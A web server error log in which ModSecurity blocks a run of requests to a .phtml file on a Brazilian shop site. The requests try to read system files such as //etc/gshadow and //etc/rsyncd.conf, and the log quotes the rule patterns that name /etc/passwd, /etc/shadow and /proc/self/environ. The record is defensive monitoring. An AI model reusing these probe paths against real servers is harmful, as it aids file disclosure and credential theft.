[Thu Mar 19 14:38:41.527743 2026] [:error] [pid 17653:tid 140411624429312] [client 57.141.18.61:47330] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ocdf6f5d65gmYZSWuAAAAs4"]
[Thu Mar 19 14:38:41.694660 2026] [:error] [pid 7545:tid 140411691570944] [client 57.141.18.9:47334] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0oX8B84UptSoTJtYrYAAAAYY"]
[Thu Mar 19 14:38:42.115459 2026] [:error] [pid 17653:tid 140411590858496] [client 57.141.18.96:47340] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0osdf6f5d65gmYZSWugAAAtI"]
[Thu Mar 19 14:38:42.269529 2026] [:error] [pid 8307:tid 140411674785536] [client 57.141.18.51:47346] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0or-FhjpZGs9ba8qHFQAAAwg"]
[Thu Mar 19 14:38:42.511369 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.60:47354] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ohCii7xarUs8iHYFtAAAAg4"]
[Thu Mar 19 14:38:43.124998 2026] [:error] [pid 27293:tid 140411624429312] [client 57.141.18.14:47372] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0o_-YZRR_7pZ7nDKnuAAAA84"]
[Thu Mar 19 14:38:43.203674 2026] [:error] [pid 30077:tid 140411716749056] [client 57.141.18.51:47374] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0o_u8EFLIOrSqIpvE7AAAAkM"]
[Thu Mar 19 14:38:43.666986 2026] [:error] [pid 15826:tid 140411674785536] [client 57.141.18.92:47384] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0o-oXxyEfFpUF8f8o1QAAAUg"]
[Thu Mar 19 14:38:44.103954 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.28:47398] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0pPqxLDW4GITHUkSE7QAAAQ4"]
[Thu Mar 19 14:38:44.540335 2026] [:error] [pid 17887:tid 140411548894976] [client 57.141.18.101:47412] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0pAkwaGbbGflqUZDl2QAAANc"]
[Thu Mar 19 14:38:44.985028 2026] [:error] [pid 14269:tid 140411666392832] [client 57.141.18.7:47434] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0pAbLMZ6AikZjR9V5sAAAAAk"]
[Thu Mar 19 14:38:45.187527 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.25:47438] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0peoXxyEfFpUF8f8o2AAAAUE"]
[Thu Mar 19 14:38:45.229276 2026] [:error] [pid 14269:tid 140411674785536] [client 57.141.18.6:47440] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0pQbLMZ6AikZjR9V5sQAAAAg"]
[Thu Mar 19 14:38:45.707631 2026] [:error] [pid 30077:tid 140411658000128] [client 57.141.18.46:47458] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0pfu8EFLIOrSqIpvE7QAAAko"]
[Thu Mar 19 14:38:46.003970 2026] [:error] [pid 17887:tid 140411699963648] [client 57.141.18.7:47464] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0pgkwaGbbGflqUZDl3AAAAMU"]
[Thu Mar 19 14:38:46.084098 2026] [:error] [pid 17887:tid 140411641214720] [client 57.141.18.19:47466] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0pgkwaGbbGflqUZDl3QAAAMw"]
[Thu Mar 19 14:38:46.708647 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.82:47480] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0pvqxLDW4GITHUkSE8AAAAQo"]
[Thu Mar 19 14:38:47.149796 2026] [proxy_fcgi:error] [pid 14269:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43866] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:38:47.411657 2026] [:error] [pid 30077:tid 140411616036608] [client 57.141.18.47:47502] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0p_u8EFLIOrSqIpvE7wAAAk8"]
[Thu Mar 19 14:38:47.486865 2026] [:error] [pid 17653:tid 140411666392832] [client 57.141.18.109:47510] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0p8df6f5d65gmYZSWvQAAAsk"]
[Thu Mar 19 14:38:47.715272 2026] [:error] [pid 8307:tid 140411599251200] [client 57.141.18.72:47512] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0p7-FhjpZGs9ba8qHFgAAAxE"]
[Thu Mar 19 14:38:48.233285 2026] [:error] [pid 7545:tid 140411649607424] [client 57.141.18.67:47526] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0qH8B84UptSoTJtYrYgAAAYs"]
[Thu Mar 19 14:38:48.336195 2026] [:error] [pid 7545:tid 140411674785536] [client 57.141.18.98:47534] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0qH8B84UptSoTJtYrYwAAAYg"]
[Thu Mar 19 14:38:48.671491 2026] [:error] [pid 14269:tid 140411632822016] [client 57.141.18.47:47544] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0qAbLMZ6AikZjR9V5tAAAAA0"]
[Thu Mar 19 14:38:49.313007 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.36:47570] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0qfqxLDW4GITHUkSE8QAAARE"]
[Thu Mar 19 14:38:50.015501 2026] [:error] [pid 17653:tid 140411574073088] [client 57.141.18.45:47590] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0qsdf6f5d65gmYZSWwQAAAtQ"]
[Thu Mar 19 14:38:50.376030 2026] [:error] [pid 7235:tid 140411607643904] [client 57.141.18.115:47610] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0qvqxLDW4GITHUkSE8gAAARA"]
[Thu Mar 19 14:38:50.409030 2026] [:error] [pid 17653:tid 140411607643904] [client 57.141.18.9:47614] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0qsdf6f5d65gmYZSWxAAAAtA"]
[Thu Mar 19 14:38:51.111456 2026] [:error] [pid 17653:tid 140411699963648] [client 57.141.18.119:47552] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0q8df6f5d65gmYZSWxgAAAsU"]
[Thu Mar 19 14:38:51.276021 2026] [:error] [pid 17653:tid 140411708356352] [client 57.141.18.20:47634] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0q8df6f5d65gmYZSWxwAAAsQ"]
